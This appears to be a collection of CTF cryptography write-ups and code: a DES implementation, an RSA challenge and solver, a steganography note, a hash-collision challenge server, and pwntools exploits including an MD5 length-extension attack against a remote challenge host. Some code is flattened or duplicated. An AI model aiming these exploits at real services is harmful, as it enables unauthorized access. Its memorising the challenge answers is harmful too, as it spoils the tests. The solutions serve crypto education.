import CreateSubkey as cs
import F_function as f
# 十六进制转二进制比特串
Hex2bin = lambda m: [val for x in list(m) for val in f"{x:08b}"]
# 二进制比特串转十六进制
bin2Hex = lambda txt: bytes([int(''.join(txt[i:i + 8]), 2) for i in range(0, 64, 8)])
# 按照DES算法的流程图进行运算
def Encryption(plaintext, key):
text = Hex2bin(plaintext)
keybit = Hex2bin(key)
keylist = cs.Subkey(keybit)
text1 = f.IP(text, 0)  # IP置换
L = text1[:32]
R = text1[32:64]
for i in range(16):
tmp = R
tmp = f.Extend(tmp)
tmp = f.Xor(tmp, keylist[i])
# print('xor:', hex(int(''.join(tmp), 2)))
tmp = f.S_replace(tmp)
# print('S:', hex(int(''.join(tmp), 2)))
tmp = f.P_replace(tmp)
# print('P:', hex(int(''.join(tmp), 2)))
tmp = f.Xor(tmp, L)
# print('pres ^ L:', hex(int(''.join(tmp), 2)))
L = R
R = tmp
L, R = R, L
ctext = L
ctext.extend(R)
ctext = f.IP(ctext, 1)
return bin2Hex(ctext)
def Decryption(ptext, key):
text = Hex2bin(ptext)
keybit = Hex2bin(key)
keylist = cs.Subkey(keybit)
text1 = f.IP(text, 0)  # IP置换
L = [text1[i] for i in range(32)]
R = [text1[i] for i in range(32, 64)]
for i in range(16):
tmp = R
tmp = f.Extend(tmp)
tmp = f.Xor(tmp, keylist[15 - i])
tmp = f.S_replace(tmp)
tmp = f.P_replace(tmp)
tmp = f.Xor(tmp, L)
L = R
R = tmp
L, R = R, L
ctext = L
ctext.extend(R)
ctext = f.IP(ctext, 1)
return bin2Hex(ctext)
==> F_function.py <==
MaxTime = 16
# IP置换表 64Bytes
IP_table = [58, 50, 42, 34, 26, 18, 10, 2,
60, 52, 44, 36, 28, 20, 12, 4,
62, 54, 46, 38, 30, 22, 14, 6,
64, 56, 48, 40, 32, 24, 16, 8,
57, 49, 41, 33, 25, 17, 9, 1,
59, 51, 43, 35, 27, 19, 11, 3,
61, 53, 45, 37, 29, 21, 13, 5,
63, 55, 47, 39, 31, 23, 15, 7]
# 逆IP置换表 64 Bytes
Inv_IP_table = [40, 8, 48, 16, 56, 24, 64, 32,
39, 7, 47, 15, 55, 23, 63, 31,
38, 6, 46, 14, 54, 22, 62, 30,
37, 5, 45, 13, 53, 21, 61, 29,
36, 4, 44, 12, 52, 20, 60, 28,
35, 3, 43, 11, 51, 19, 59, 27,
34, 2, 42, 10, 50, 18, 58, 26,
33, 1, 41, 9, 49, 17, 57, 25]
# S盒 512 Bytes
# S盒中的S1盒 64Bytes
S1 = [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,
0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,
4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,
15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
# S盒中的S2盒
S2 = [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,
3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,
0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,
13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]
# S盒中的S3盒
S3 = [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,
13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,
13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,
1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]
# S盒中的S4盒
S4 = [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,
13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,
10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,
3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]
# S盒中的S5盒
S5 = [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,
14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,
4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,
11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]
# S盒中的S6盒
S6 = [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,
10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,
9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,
4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]
# S盒中的S7盒
S7 = [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,
13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,
1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,
6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]
# S盒中的S8盒
S8 = [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,
1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,
7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,
2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]
# S盒 512 Bytes
S = [S1, S2, S3, S4, S5, S6, S7, S8]
# 用于对数据进行扩展置换,将32bit数据扩展为48bit
extend_table = [32, 1, 2, 3, 4, 5,
4, 5, 6, 7, 8, 9,
8, 9, 10, 11, 12, 13,
12, 13, 14, 15, 16, 17,
16, 17, 18, 19, 20, 21,
20, 21, 22, 23, 24, 25,
24, 25, 26, 27, 28, 29,
28, 29, 30, 31, 32, 1]
# P盒 32 Bytes
P_table = [16, 7, 20, 21, 29, 12, 28, 17,
1, 15, 23, 26, 5, 18, 31, 10,
2, 8, 24, 14, 32, 27, 3, 9,
19, 13, 30, 6, 22, 11, 4, 25]
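def int2bit(n):
    """Return the low four bits of ``n`` as a list of '0'/'1' strings, most significant bit first.

    Intended for S-box outputs in the range 0..15. The bits are extracted with
    integer shifts, so no float division is involved.
    """
    return [str((n >> shift) & 1) for shift in (3, 2, 1, 0)]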
# Initial permutation: op == 0 applies IP_table, op == 1 applies the inverse table
def IP(text, op):
    """Permute the 64-element bit list ``text`` and return the permuted list.

    ``op`` selects the table: 0 for the initial permutation, 1 for its
    inverse. Any other value makes the function return ``None``.
    """
    if op == 0:
        table = IP_table
    elif op == 1:
        table = Inv_IP_table
    else:
        return None
    # Table entries are 1-based bit positions.
    return [text[table[i] - 1] for i in range(64)]
# 进行扩展,将32位扩展为48位
def Extend(text):
extend = [0 for i in range(48)]
for i in range(48):
extend[i] = text[extend_table[i] - 1]
return extend
# S盒变换部分
def S_replace(text):
Sresult = [0 for k in range(32)]
for k in range(8):
row = 2 * int(text[k * 6]) + int(text[k * 6 + 5])
column = 8 * int(text[k * 6 + 1]) + 4 * int(text[k * 6 + 2]) + 2 * int(text[k * 6 + 3]) + int(text[k * 6 + 4])
tmp = S[k][row * 16 + column]
for i in range(4):
Sresult[4 * k + i] = int2bit(tmp)[i]
return Sresult
# P置换部分
def P_replace(text):
Presult = [0 for i in range(32)]
for i in range(32):
Presult[i] = text[P_table[i] - 1]
return Presult
# XOR of two bit lists
def Xor(bit1, bit2):
    """Return the element-wise XOR of ``bit1`` and ``bit2`` as a list of '0'/'1' strings.

    The result has ``len(bit1)`` elements. ``bit2`` must be at least that long;
    any extra elements in it are ignored.
    """
    return [str(int(bit1[i]) ^ int(bit2[i])) for i in range(len(bit1))]

two old man

#***Task
from Crypto.Util.number import getPrime, bytes_to_long
from gmpy2 import next_prime
from os import urandom
p = getPrime(512)
q = next_prime(p)
f = open('flag.txt', 'rb')
flag = bytes_to_long(f.read() + urandom(80))
f.close()
n = p * q
noise = 1
for i in range(1, p):
noise = (noise * i) % n
e = 65537
m = noise * flag % n
c = pow(m, e, n)
f = open('cipher.txt', 'w')
f.write(f'n = {n}\n')
f.write(f'c = {c}\n')
f.close()
# n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
# c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
#***Solution
# -*- coding: utf-8 -*-
from Crypto.Util.number import long_to_bytes, isPrime
from gmpy2 import invert, powmod
from libnum import solve_crt
from functools import reduce
n = 85300075344029411815824595503988243445862905766678219075505308650733618833670564881852727486124268400610986787128098448019033364495139613324970241727110931819892696714818851281415775513570277910383275087114654129682377412912019832281317957560043184535419626656895668221654944747681971549122289940681069900407
c = 9573652589542765552302771253681350397003834739308979745013100413124314842798363931809688570564520116621700487372591176287735200842509675988724251662626729985842786542792501720096155870937426730816107184806453412679852267311433564241907769415712680798333238722253896962273334726781549003053182286964079196169
e = 65537
p = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625526487
q = 9235803990126112015712488678718763955409551939176855113164196792808741000738495903574101715848666926223811357608313697206174389466866723210464201625528161
d = invert(e, (p-1)*(q-1))
assert p*q == n
m = pow(c, d, n)
d1 = invert(p-1, p)
print(f'd1 = {d1}')
m1 = m * d1 % p
print(f'm1 = {m1}')
s = reduce(lambda x,y: x * y % n, range(p, q), 1)
d2 = invert(s, q)
s = d2 * (q - 1) % q
d2 = invert(s, q)
print(f'd2 = {d2}')
m2 = m * d2 % q
print(f'm2 = {m2}')
m = solve_crt((m1, m2), (p, q))
print(long_to_bytes(m)[:-80])
b'flag{c7cfdbc1-729b-de11-239f-a473ec0637b8}'

tupian

open Stegsolve  open gif imge
Analyse->frame browser
convert new_gif.gif -coalesce xx_%05d.png
Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
base64_text -d Y2F0Y2hfdGhlX2R5bmFtaWNfZmxhZ19pc19xdW10ZV9zaW1wbGU=
catch_the_dynamic_flag_is_qumte_simple

Train

task.py

from Crypto.Util.number import*
from hashlib import sha256
import socketserver
import signal
import string
import random
from secret import flag
banner = br'''
.oooooo..o                             oooo  oooo  ooooooooooooo                     o8o
d8P'    `Y8                             `888  `888  8'   888   `8                     `"'
Y88bo.      ooo. .oo.  .oo.    .oooo.    888   888       888      oooo d8b  .oooo.   oooo  ooo. .oo.
`"Y8888o.  `888P"Y88bP"Y88b  `P  )88b   888   888       888      `888""8P `P  )88b  `888  `888P"Y88b
`"Y88b  888   888   888   .oP"888   888   888       888       888      .oP"888   888   888   888
oo     .d8P  888   888   888  d8(  888   888   888       888       888     d8(  888   888   888   888
8""88888P'  o888o o888o o888o `Y888""8o o888o o888o     o888o     d888b    `Y888""8o o888o o888o o888o
'''
n0 = 30798082519452208630254982405300548841337042015746308462162479889627080155514391987610153873334549377764946092629701
g = 64146569863628228208271069055817252751116365290967978172021890038925428672043
def TrainHash(msg):
n = n0
msg = map(ord,msg)
for i in msg :
n = g * (n+i)
n = n & (1<<383)
return n - 0xf5e33dabb114514
table = string.ascii_letters+string.digits
MENU = br'''
<OPTION>
'''
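class Task(socketserver.BaseRequestHandler):
    """Per-connection handler: proof of work first, then the hash-collision question."""

    def _recvall(self):
        """Read from the socket until a chunk shorter than BUFF_SIZE arrives; return it stripped."""
        BUFF_SIZE = 2048
        data = b''
        while True:
            part = self.request.recv(BUFF_SIZE)
            data += part
            # A short (or empty) chunk is taken as the end of the client's message.
            if len(part) < BUFF_SIZE:
                break
        return data.strip()

    def send(self, msg, newline=True):
        """Best-effort send of ``msg`` (bytes), optionally followed by a newline."""
        try:
            if newline:
                msg += b'\n'
            self.request.sendall(msg)
        except Exception:
            # A failed send must not take the handler down, but SystemExit and
            # KeyboardInterrupt are no longer swallowed as with a bare except.
            pass

    def recv(self, prompt=b'SERVER <INPUT>: '):
        """Send ``prompt`` without a newline and return the client's stripped reply."""
        self.send(prompt, newline=False)
        return self._recvall()

    def proof_of_work(self):
        """Ask the client for the hidden first four characters of a random 20-character string.

        Returns the hex digest (str) of the full string on success, False otherwise.
        """
        # NOTE(review): `random` is not a cryptographic generator; that is acceptable
        # only as long as this check is nothing more than a rate limiter.
        proof = (''.join([random.choice(table) for _ in range(20)])).encode()
        sha = sha256(proof).hexdigest().encode()
        self.send(b"[+] sha256(XXXX+" + proof[4:] + b") == " + sha)
        XXXX = self.recv(prompt=b'[+] Plz Tell Me XXXX :')
        if len(XXXX) != 4 or sha256(XXXX + proof[4:]).hexdigest().encode() != sha:
            return False
        return sha.decode()

    def handle(self):
        """Run one session: proof of work, then compare the hashes of two client strings."""
        # Schedule SIGALRM 30 seconds after the connection is accepted.
        signal.alarm(30)
        FirstBlockHash = self.proof_of_work()
        if not FirstBlockHash:
            # Stop here: without the return the handler carried on using a
            # socket it had just closed.
            self.request.close()
            return
        self.send(banner)
        self.send(b"\nPlease give me 2 strings that are same when are hashed  =.=  ")
        try:
            string1 = self.recv().decode()
            string2 = self.recv().decode()
        except UnicodeDecodeError:
            # Client input is untrusted; bytes that do not decode end the session cleanly.
            self.send(b"\nConnection has been closed  =.=  ")
            self.request.close()
            return
        # NOTE(review): nothing below requires string1 != string2, so sending the
        # same string twice satisfies both comparisons. A real collision check
        # has to reject identical inputs first.
        if TrainHash(string1) == TrainHash(string2):
            self.send(b'\nJust do it!~ You can do more!')
            if string2.encode()[-50:] == string1.encode()[-50:]:
                self.send(flag)
        self.send(b"\nConnection has been closed  =.=  ")
        self.request.close()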
class ThreadedServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class ForkedServer(socketserver.ForkingMixIn, socketserver.TCPServer):
pass
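if __name__ == "__main__":
    # 0.0.0.0 listens on every interface of the host.
    HOST, PORT = '0.0.0.0', 10012
    print("HOST:POST " + HOST+":" + str(PORT))
    # allow_reuse_address is consulted while the constructor binds the socket,
    # so it has to be set on the class before the server object is created;
    # assigning it on the instance afterwards has no effect on the bind.
    ForkedServer.allow_reuse_address = True
    server = ForkedServer((HOST, PORT), Task)
    server.serve_forever()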

exp.py

from pwn import *
import string
import hashlib
table = string.ascii_letters + string.digits
re = remote('39.106.48.123',29929)
re.recvuntil(b'[+] sha256(XXXX+')
x = re.recv(16)
re.recvuntil(b') == ')
y = re.recv(64)
flag = 0
for a in table:
if flag:break
for b in table:
if flag: break
for c in table:
if flag: break
for d in table:
z = (a + b + c + d).encode()
if hashlib.sha256(z + x).hexdigest() == y.decode():
flag = 1
re.recv()
re.sendline(z)
break
re.recvuntil(b'SERVER <INPUT>: ')
re.sendline(b'a')
re.recvuntil(b'SERVER <INPUT>: ')
re.sendline(b'a')
re.interactive()
if hashlib.sha256(z + x).hexdigest() == y.decode():
flag = 1
re.recv()
re.sendline(z)
re.recvuntil(b'SERVER <INPUT>: ')
re.sendline(b'a')
re.recvuntil(b'SERVER <INPUT>: ')
re.sendline(b'a')
re.interactive()

TrainPlus

exp.py

'''
给出了一个16字节随机生成的一个字符串,已知量。并且使用自己的MD00PLUS去对sec进行一次哈希,
发现需要给出一个消息 以及sec+这个消息 能够让我们预测到这块的哈希是多少
首先我们得看一下MD00Plus这个函数,我们发现他其实跟正常的MD5不一样,而改变的地方就是一开始的padding部分
那么其实如果了解哈希长度攻击的很快就能发现只要给出这样的就可以成功。
'''
def Md00Plus(message: bytes):
h0 = 0x114514ab
h1 = 0x1919810a
h2 = 0xa0189191
h3 = 0xba415411
R = (7, 12, 17, 22) * 4 + (5, 9, 14, 20) * 4 + (4, 11, 16, 23) * 4 + (6, 10, 15, 21) * 4
K = (0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee,
0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8,
0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193,
0xa679438e, 0x49b40821, 0xf61e2562, 0xc040b340, 0x265e5a51,
0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905,
0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a, 0xfffa3942, 0x8771f681,
0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60,
0xbebfbc70, 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05,
0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665, 0xf4292244,
0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92,
0xffeff47d, 0x85845dd1, 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314,
0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391)
F = lambda x, y, z: ((x & y) | ((~x) & z))
G = lambda x, y, z: ((x & z) | (y & (~z)))
H = lambda x, y, z: (x ^ y ^ z)
I = lambda x, y, z: (y ^ (x | (~z)))
L = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xffffffff
W = lambda i4, i3, i2, i1: (i1 << 24) | (i2 << 16) | (i3 << 8) | i4
reverse = lambda x: (x << 24) & 0xff000000 | (x << 8) & 0x00ff0000 | \
(x >> 8) & 0x0000ff00 | (x >> 24) & 0x000000ff
ascii_list = list(map(lambda x: x, message))
msg_length = len(ascii_list) * 8
ascii_list.append(128)
while (len(ascii_list) * 8 + 64) % 512 != 0:
ascii_list.append(1)
for i in range(8):
ascii_list.append((msg_length >> (8 * i)) & 0xff)
for i in range(len(ascii_list) // 64):
a, b, c, d = h0, h1, h2, h3
for j in range(64):
if 0 <= j <= 15:
f = F(b, c, d) & 0xffffffff
g = j
elif 16 <= j <= 31:
f = G(b, c, d) & 0xffffffff
g = ((5 * j) + 1) % 16
elif 32 <= j <= 47:
f = H(b, c, d) & 0xffffffff
g = ((3 * j) + 5) % 16
else:
f = I(b, c, d) & 0xffffffff
g = (7 * j) % 16
aa, dd, cc = d, c, b
s = i * 64 + g * 4
w = W(ascii_list[s], ascii_list[s + 1], ascii_list[s + 2], ascii_list[s + 3])
bb = (L((a + f + K[j] + w) & 0xffffffff, R[j]) + b) & 0xffffffff
a, b, c, d = aa, bb, cc, dd
h0 = (h0 + a) & 0xffffffff
h1 = (h1 + b) & 0xffffffff
h2 = (h2 + c) & 0xffffffff
h3 = (h3 + d) & 0xffffffff
h0, h1, h2, h3 = reverse(h0), reverse(h1), reverse(h2), reverse(h3)
digest = (h0 << 96) | (h1 << 64) | (h2 << 32) | h3
return hex(digest)[2:].rjust(32, '0'),ascii_list
def md5ex(hash,message: bytes):
reverse = lambda x: (x << 24) & 0xff000000 | (x << 8) & 0x00ff0000 | \
(x >> 8) & 0x0000ff00 | (x >> 24) & 0x000000ff
hash = int(hash,16)
h3 = reverse(hash&0xffffffff)
hash >>= 32
h2 = reverse(hash&0xffffffff)
hash >>= 32
h1 = reverse(hash&0xffffffff)
hash >>= 32
h0 = reverse(hash&0xffffffff)
R = (7, 12, 17, 22) * 4 + (5, 9, 14, 20) * 4 + (4, 11, 16, 23) * 4 + (6, 10, 15, 21) * 4
K = (0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee,
0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8,
0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193,
0xa679438e, 0x49b40821, 0xf61e2562, 0xc040b340, 0x265e5a51,
0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905,
0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a, 0xfffa3942, 0x8771f681,
0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60,
0xbebfbc70, 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05,
0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665, 0xf4292244,
0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92,
0xffeff47d, 0x85845dd1, 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314,
0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391)
F = lambda x, y, z: ((x & y) | ((~x) & z))
G = lambda x, y, z: ((x & z) | (y & (~z)))
H = lambda x, y, z: (x ^ y ^ z)
I = lambda x, y, z: (y ^ (x | (~z)))
L = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xffffffff
W = lambda i4, i3, i2, i1: (i1 << 24) | (i2 << 16) | (i3 << 8) | i4
ascii_list = list(map(lambda x: x, message))
msg_length = len(ascii_list) * 8 + 512
ascii_list.append(128)
while (len(ascii_list) * 8 + 64) % 512 != 0:
ascii_list.append(1)
for i in range(8):
ascii_list.append((msg_length >> (8 * i)) & 0xff)
for i in range(len(ascii_list) // 64):
a, b, c, d = h0, h1, h2, h3
for j in range(64):
if 0 <= j <= 15:
f = F(b, c, d) & 0xffffffff
g = j
elif 16 <= j <= 31:
f = G(b, c, d) & 0xffffffff
g = ((5 * j) + 1) % 16
elif 32 <= j <= 47:
f = H(b, c, d) & 0xffffffff
g = ((3 * j) + 5) % 16
else:
f = I(b, c, d) & 0xffffffff
g = (7 * j) % 16
aa, dd, cc = d, c, b
s = i * 64 + g * 4
w = W(ascii_list[s], ascii_list[s + 1], ascii_list[s + 2], ascii_list[s + 3])
bb = (L((a + f + K[j] + w) & 0xffffffff, R[j]) + b) & 0xffffffff
a, b, c, d = aa, bb, cc, dd
h0 = (h0 + a) & 0xffffffff
h1 = (h1 + b) & 0xffffffff
h2 = (h2 + c) & 0xffffffff
h3 = (h3 + d) & 0xffffffff
h0, h1, h2, h3 = reverse(h0), reverse(h1), reverse(h2), reverse(h3)
digest = (h0 << 96) | (h1 << 64) | (h2 << 32) | h3
return hex(digest)[2:].rjust(32, '0'),ascii_list
from pwn import*
import string
from pwnlib.util.iters import mbruteforce
from hashlib import*
table = string.ascii_letters+string.digits
# Connect to the challenge service (address as given in the write-up).
io = remote("39.106.48.123",39628)


def pow1():
    """Solve the service's proof-of-work and return the target digest.

    Reads a 16-character suffix and a SHA-256 hex digest from the socket,
    searches all 4-character strings over ``table`` for the prefix whose
    ``sha256(prefix + suffix)`` equals that digest, and sends it back.
    """
    io.recvuntil(b'XXXX+')
    tail = io.recv(16).decode("utf8")
    io.recvuntil(b'== ')
    target = io.recvline().strip().decode("utf8")

    def matches(candidate):
        return sha256((candidate + tail).encode()).hexdigest() == target

    answer = mbruteforce(matches, table, length=4, method='fixed')
    io.sendlineafter(b'XXXX :', answer.encode())
    return target


pow1()
io.recvuntil(b'Thing:')
GreatThing = io.recv(16)
from Crypto.Util.number import*
io.recvuntil(b'REATTHING:')
Md00 = io.recv(32)
# md5ex / Md00Plus are defined earlier in this file. They appear to continue an
# MD5 computation from a known digest and to expose the padded message, i.e. a
# length-extension of MD5(secret || data) -- presumably; confirm against those
# definitions. A keyed construction such as HMAC does not have this property.
H = md5ex(Md00.decode(),GreatThing)[0].encode()
# The secret's length is unknown, so every length from 1 to 25 is tried.
for guess_len in range(1, 26):
    Pad = Md00Plus(guess_len * b'a')[1][guess_len:]
    MSG = bytes(Pad) + GreatThing
    msg_hex = format(bytes_to_long(MSG), 'x').encode()
    mac_hex = format(bytes_to_long(H), 'x').encode()
    io.sendline(msg_hex + b',' + mac_hex)
    print(guess_len, io.recv())
    msg = io.recv()
    if b'flag' not in msg:
        continue
    print(msg)
    break
io.interactive()

tea_签到题

/******************************************
Use: "Hello World!".encrypt("key")
=> "íSjÝqTÂWÕã”Aa[UÄ"
******************************************/
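// Encrypt this string with the block function code() and return an escaped
// ciphertext string.
//
// password: only its first 16 characters are used; they are packed directly
//           into the four 32-bit key words. Slices past the end of a short
//           password pack to 0, so a 6-character password fills only part of
//           the 128-bit key. No key-derivation function is applied.
// returns:  ciphertext with control characters escaped by escCtrlCh().
//
// Caveats for anyone reusing this outside a demo: every 8-character block is
// encrypted independently (electronic codebook mode), so equal plaintext blocks
// give equal ciphertext blocks, and nothing authenticates the ciphertext.
//
// note: if plaintext or password are passed as string objects, rather than strings, this
// function will throw an 'Object doesn't support this property or method' error
String.prototype.encrypt = function(password) {
  const v = new Array(2);
  const k = new Array(4);
  let s = "";
  // Declared locally: the original assigned an undeclared `plaintext`, which
  // creates a global in sloppy mode and throws in strict mode / ES modules.
  const plaintext = escape(this); // use escape() so only have single-byte chars to encode
  // build key directly from 1st 16 chars of password
  for (let i = 0; i < 4; i++) k[i] = Str4ToLong(password.slice(i * 4, (i + 1) * 4));
  for (let i = 0; i < plaintext.length; i += 8) { // encode plaintext into s in 64-bit (8 char) blocks
    v[0] = Str4ToLong(plaintext.slice(i, i + 4));
    v[1] = Str4ToLong(plaintext.slice(i + 4, i + 8));
    code(v, k);
    s += LongToStr4(v[0]) + LongToStr4(v[1]);
  }
  return escCtrlCh(s);
};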
// Like C code
function code(v, k) {
  // Extended TEA: this is the 1997 revised version of Needham & Wheeler's algorithm
  // params: v[2] 64-bit value block; k[4] 128-bit key
  // The block is encrypted in place: v[0] and v[1] are overwritten on return.
  let y = v[0];
  let z = v[1];
  const delta = 0x9E3779B9;
  const limit = delta * 32; // sum grows by delta once per pass, so the loop runs 32 times
  let sum = 0;
  while (sum != limit) {
    // Operator precedence matters here: + binds tighter than the shifts, and the
    // shifts bind tighter than ^, so each line is
    //   ((x << 4 ^ x >>> 5) + x) ^ (sum + k[index]).
    y += (z << 4 ^ z >>> 5) + z ^ sum + k[sum & 3];
    sum += delta;
    z += (y << 4 ^ y >>> 5) + y ^ sum + k[sum >>> 11 & 3];
    // note: unsigned right-shift '>>>' is used in place of original '>>', due to lack
    // of 'unsigned' type declaration in JavaScript (thanks to Karsten Kraus for this)
  }
  // y, z and sum are ordinary JS numbers and are not truncated here; the bitwise
  // operators above, and LongToStr4() in the caller, reduce them to 32 bits on use.
  v[0] = y;
  v[1] = z;
}
// supporting functions
// Pack up to four characters of s into one 32-bit integer, first character in
// the lowest byte. Positions past the end of s contribute 0.
function Str4ToLong(s) {
  let packed = 0;
  let shift = 0;
  for (let idx = 0; idx < 4; idx += 1) {
    packed |= s.charCodeAt(idx) << shift;
    shift += 8;
  }
  if (isNaN(packed)) {
    return 0;
  }
  return packed;
}
// Unpack a 32-bit integer into a 4-character string, lowest byte first
// (the inverse of Str4ToLong for single-byte characters).
function LongToStr4(v) {
  const bytes = [0, 8, 16, 24].map((shift) => (v >> shift) & 0xFF);
  return String.fromCharCode(...bytes);
}
// Replace control characters, quotes, non-breaking space and '!' with
// "!<char code>!" so the ciphertext survives being handled as text.
function escCtrlCh(str) {
  function wrapCode(ch) {
    return "!" + ch.charCodeAt(0) + "!";
  }
  return str.replace(/[\0\t\n\v\f\r\xa0'"!]/g, wrapCode);
}
// Reverse escCtrlCh(): turn every "!<1-3 digits>!" token back into the
// character with that code.
function unescCtrlCh(str) {
  const decodeToken = (token) => {
    const digits = token.slice(1, -1);
    return String.fromCharCode(Number(digits));
  };
  return str.replace(/!\d\d?\d?!/g, decodeToken);
}
// module.exports = (text, password) => text.encrypt(password);
/******************************************
Use: "íSjÝqTÂWÕã”Aa[UÄ".decrypt("key")
=> "Hello World!"
******************************************/
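// Decrypt a string produced by encrypt() with the same password.
//
// password: only its first 16 characters are used, packed directly into the
//           four 32-bit key words (no key-derivation function).
// returns:  the recovered plaintext after unescape().
//
// Nothing authenticates the ciphertext: a wrong password or modified input is
// not detected and simply decodes to different text.
String.prototype.decrypt = function(password) {
  const v = new Array(2);
  const k = new Array(4);
  let s = "";
  for (let i = 0; i < 4; i++) k[i] = Str4ToLong(password.slice(i * 4, (i + 1) * 4));
  // Declared locally: the original assigned an undeclared `ciphertext`, which
  // creates a global in sloppy mode and throws in strict mode / ES modules.
  const ciphertext = unescCtrlCh(this);
  for (let i = 0; i < ciphertext.length; i += 8) { // decode ciphertext into s in 64-bit (8 char) blocks
    v[0] = Str4ToLong(ciphertext.slice(i, i + 4));
    v[1] = Str4ToLong(ciphertext.slice(i + 4, i + 8));
    decode(v, k);
    s += LongToStr4(v[0]) + LongToStr4(v[1]);
  }
  // strip trailing null chars resulting from filling 4-char blocks:
  s = s.replace(/\0+$/, '');
  return unescape(s);
};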
// Like C code
function decode(v, k) {
  // Inverse of code(): decrypts the 64-bit block v[2] in place with the
  // 128-bit key k[4] by undoing the two updates of each pass in reverse order.
  let y = v[0];
  let z = v[1];
  const delta = 0x9E3779B9;
  let sum = delta * 32; // start from the final sum of code() and count down to 0 (32 passes)
  while (sum != 0) {
    // Same precedence as in code(): ((x << 4 ^ x >>> 5) + x) ^ (sum + k[index]).
    z -= (y << 4 ^ y >>> 5) + y ^ sum + k[sum >>> 11 & 3];
    sum -= delta;
    y -= (z << 4 ^ z >>> 5) + z ^ sum + k[sum & 3];
  }
  v[0] = y;
  v[1] = z;
}
// supporting functions
